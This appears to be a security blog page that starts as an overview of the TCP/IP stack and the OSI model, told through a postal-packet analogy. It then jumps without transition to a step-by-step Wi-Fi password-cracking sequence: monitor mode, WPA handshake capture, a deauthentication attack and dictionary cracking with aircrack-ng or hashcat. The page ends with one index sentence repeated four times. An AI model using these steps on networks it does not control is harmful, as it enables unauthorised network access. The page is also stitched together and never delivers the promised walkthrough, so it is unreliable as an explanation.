This article is an overview of TCP/IP protocol stack. I will cover in detail what happens when a request to, say, bakerst221b.com is sent in the browser.
There is this famous OSI model… If you have ever scratched the surface of network security, you must have heard of it. It’s an empermal model (like spherical eggs 🥚 in the vacuum - a joke from Big Bang Theory). It’s not a real thing, it’s more like a blueprint 🗺️ for making real things. This model basically describes, what an empermal packet sent over network should approximately look like. It’s called a packet 📦 because it looks very much like one: your message wrapped in an envelope, wrapped in some paper, put into a box and sent via post office and finally delivered to the door. Comparing this process with mail services is not uncommon, but I will use it in my example. However, to make the process clearer, I’ve sacrificied some realism. Though it’s unreal, in my humble opinion it better describes the process.
iwconfig
airmon-ng check kill
airmon-ng start wlan0
iwconfig
airodump-ng wlan0mon
airdump-ng -c <channel number> --bssid <access point MAC> -w capture wlan0mon to capture the handshake or enough data to deduce the key. To speed up - deauth attack (temp disassociate the client).
aireplay-ng -0 1 -a <MAC of AP> -c <client MAC> <interface> along with the above command still running. Look at capure file. Get a dictionary of weak passwords or some probable options, crack with hashcat or aircrack-ng -w <wordlist> -b <MAC> <capturefile>.
[1]
This set of articles describe network protocols for each layer separately. Each article may contain an attack description and how to metigate it.
This set of articles describe network protocols for each layer separately. Each article may contain an attack description and how to metigate it.
This set of articles describe network protocols for each layer separately. Each article may contain an attack description and how to metigate it.
This set of articles describe network protocols for each layer separately. Each article may contain an attack description and how to metigate it.